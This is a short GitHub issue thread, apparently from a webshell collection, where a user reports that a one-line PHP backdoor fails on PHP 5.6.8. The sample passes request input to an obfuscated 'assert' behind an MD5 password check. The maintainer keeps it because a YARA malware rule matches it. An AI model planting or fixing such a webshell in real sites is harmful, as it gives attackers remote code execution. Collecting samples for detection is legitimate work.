### ISSUE TITLE
webshell/php/非常规的pHp一句话木马.php

### ISSUE THREAD

**Issue by kevins1022** [tennc/webshell#12]
<?php @md5($_GET['qid'])=='850abe17d6d33516c10c6269d899fd19'?array_map("asx73ert",(array)$_REQUEST['page']):next;  ?>

这个代码有问题呀，next 这个就会报错。Notice: Use of undefined constant next - assumed 'next' in
asx73ert 这个不是assert 应该也会报错吧。function 'asx73ert' not found or invalid function name in 
我的测试环境是PHP5.6.8

**Comment by tennc** [comment]
测试没有通过~不过国外有个[shell匹配库](http://yararules.com/rules/malware.yar)
确实含这个~~ 
这个shell还是保留哈~
